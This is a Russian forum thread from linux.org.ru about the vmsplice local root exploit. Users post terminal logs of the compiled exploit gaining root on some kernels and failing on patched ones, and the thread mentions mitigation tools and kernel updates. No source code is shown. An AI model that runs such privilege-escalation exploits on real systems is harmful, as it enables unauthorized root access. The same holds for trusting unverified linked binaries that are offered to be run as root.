LINUX.ORG.RU

rootkit@rootkit-comp:~/Test$ uname -a Linux rootkit-comp 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux rootkit@rootkit-comp:~/Test$ ./5093 ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] addr: 0xc0113dba [-] wtf rootkit@rootkit-comp:~/Test$ ./5092 ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dff000 .. 0xb7e31000 [+] root root@rootkit-comp:~/Test#

rootkit
()
Ответ на: комментарий от sS

Я б не рискнул :-) Локально такие шутки надо таки проверять :-)

Valmont ★★★
()

под бубунтой работает!

Стандартная бубунта 7.10 32бит дженерик ведро. Работает.

anonymous
()
Ответ на: под бубунтой работает! от anonymous

Работет

durman@rasta:/media/sda3/exploit$ ./jessica_biel_naked_in_my_bed ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dc1000 .. 0xb7df3000 [+] root root@rasta:/media/sda3/exploit# whoami root root@rasta:/media/sda3/exploit# uname -a Linux rasta 2.6.22-14-386 #1 Sun Oct 14 22:36:54 GMT 2007 i686 GNU/Linux

durman
()
Ответ на: комментарий от durman

~$ ./a.out ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7db6000 .. 0xb7de8000 Segmentation fault ~$ uname -a Linux 1 2.6.20-16-server #2 SMP Tue Dec 18 05:52:19 UTC 2007 i686 GNU/Linux неработает убунта сервер

anonymous
()

>Вот так :) Работает у большинства.

Линукскапец отменяется. Представляем доблестным злопыхателям утилиту в стиле "Хацкеры отсосут".

http://slil.ru/25462911

Отключает vmsplice на лету, запускать из-под рута. Можно в init.d добавить скрипт. Проблем пока не выявлено, гружу тачку целый день. Для тех, кому лень пересобирать ядро, самое оно.

Для корректной работы необходимо, чтобы ядро было собрано с поддержкой kmem.

anonymous
()

В sid дырку закрыли
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d66000 .. 0xb7d98000
[-] vmsplice: Bad address

Подождем для etch

at ★★
()
Ответ на: комментарий от at

Не собирается $ gcc exploite.cpp -o exploite exploite.cpp:9:1: warning: "_GNU_SOURCE" redefined <command line>:1:1: warning: this is the location of the previous definition exploite.cpp: In function ‘void kernel_code()’: exploite.cpp:87: ошибка: некорректное преобразование из ‘void*’ в ‘uint*’

$ gcc -v Используются внутренние спецификации. Целевая архитектура: i686-pc-linux-gnu Параметры конфигурации: /var/tmp/portage/sys-devel/gcc-4.1.2/work/gcc-4.1.2/configure --prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/4.1.2 --includedir=/usr/lib/gcc/i686-pc-linux-gnu/4.1.2/include --datadir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.2 --mandir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.2/man --infodir=/usr/share/gcc-data/i686-pc-linux-gnu/4.1.2/info --with-gxx-include-dir=/usr/lib/gcc/i686-pc-linux-gnu/4.1.2/include/g++-v4 --host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --disable-altivec --enable-nls --without-included-gettext --with-system-zlib --disable-checking --disable-werror --enable-secureplt --disable-libunwind-exceptions --disable-multilib --enable-libmudflap --disable-libssp --enable-java-awt=gtk --enable-objc-gc --enable-languages=c,c++,java,objc,obj-c++,fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu Модель многопотоковости: posix gcc версия 4.1.2 (Gentoo 4.1.2)

Specter
()

на FC сегодня упдейт пришел
[laptop ~]$ uname -a
Linux laptop 2.6.23.15-137.fc8 #1 SMP Sun Feb 10 17:48:34 EST 2008 i686 i686 i386 GNU/Linux
[del@del-laptop ~]$ cc/a.out
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7ee3000 .. 0xb7f15000
[-] vmsplice: Bad address

anonymous
()

Детишечки хватит страдать хернёй. Патченые ядра давно уже во всех репозитариях.

anonymous
()
Ответ на: комментарий от anonymous

после этих обновлений перестала работать команда passwd :(

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.